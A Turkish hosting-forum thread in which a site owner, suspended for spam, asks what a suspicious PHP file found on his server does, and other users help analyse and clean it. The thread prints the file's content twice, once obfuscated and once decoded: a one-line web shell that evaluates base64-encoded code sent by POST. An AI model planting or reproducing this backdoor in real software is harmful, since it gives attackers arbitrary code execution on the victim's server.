Bu kod nedir.?

Question

Reseller hesabım spam mail gönderiyormuş,bugün bu nedenle hesabım durduruldu.
Şu anda incelemek için açtırdım,spam yapan kodu bulmaya çalışıyorum.
Public Html/css dizini altında 7c32.php diye bir dosya var 644 izinli ve içinde verdiğim kod var.

Şüphelerim bu php dosyası üzerindedir.
Bu kodun açıklamasını yapabilecek arkadaşların desteğini bekliyorum.
Teşekkürler.

<?php if(isset($_POST&#91;"cod\x65"&#93;)){eval(base64_decode($_POST&#91;"co\x64e"&#93;));}
?>

Aresbann · Answer

Base64 ile şifrelenmiş bu kod, decode etmek lazım.

t4ko · Answer

http://www.opinionatedgeek.com/dotne.../base64decode/

bu siteden decode edin hocam bakın bakalım içinde ne sürprizler saklı

SCLSDA · Answer

t4ko adlı üyeden alıntı:						mesajı görüntüle									http://www.opinionatedgeek.com/dotne.../base64decode/

bu siteden decode edin hocam bakın bakalım içinde ne sürprizler saklı  		Hata veriyor yada beceremedim.

t4ko · Answer

SCLSDA adlı üyeden alıntı:						mesajı görüntüle									Hata veriyor yada beceremedim. 		hocam dosyanın içinde bulunan kodlar yukarıdakilerse eğer bir şey bulamayız.Eğer uzunsa buraya atarsanız arkadaşlarla çözebiliriz büyük ihtimal.

SCLSDA · Answer

Tüm kod bu,içerik bu kadar.

t4ko · Answer

Bu dosyayı silip ftp yi komple indirip bir taramadan geçirmenizi öneririm.

SCLSDA · Answer

Dosyayı anında sildim zaten.
İnternette bu kod ve dosya ismiyle yaptığım aramalarda hep spam maille ilişkilendirilmiş görünüyor.
Benim konu açmamın sebebi bu kod içeriğinde ne olduğudur.
Bu kodu açabilecek arkadaşların desteğini bekliyorum.

Mustafamasa · Answer

Bu kodu ancak bu kadar çözebiliriz 
<?php 
if(isset($_POST&#91;"code"&#93;)){
eval(base64_decode($_POST&#91;"code"&#93;));
} 
?>Sayfaya dışardan kod post edip onunla bir şeyler yapıyor ama tam anlamadım. Hacklink için yapılan birşeydir diye tahmin ediyorum..

SCLSDA · Answer

Arkadaşlar,
Ftp hesabımı komple indirip avast ile taradım.
Bir sitemin forum dizinde bir bölümdeki  php dosyalarımın neredeyse tamamına  bulaşmış.
Şimdilik sitenin forum bölümünü off yaptım.
Dosyayı da dosya tc sitesine yükledim.
İçerikte 1 adet php dosya var ve aynı kodlar tekrar tekrar basılmış ve base64 kodlamanın tamamı var.
Dekode yapabilecek arkadaşların yardımını bekliyorum.
Eğer bu işin arkasından bir Türk çıkarsa da sonuna kadar takip edeceğim.

Önemli Not:
Dosya içeriğinde Base64 ile kodlanmış içeriğini bilmediğim (muhtemelen spam mail atan) zararlı yazılım bulunmaktadır,bu nedenle sadece merak için indirecek arkadaşların 2 kez düşünmelerini öneriyorum.
Avast dosya indirmede truva atı uyarısı veriyor, ESET Nod32 uykudadır

 Link : Ekli dosya başka arkadaşlara zarar verebileceği için tarafımdan kaldırılmıştır.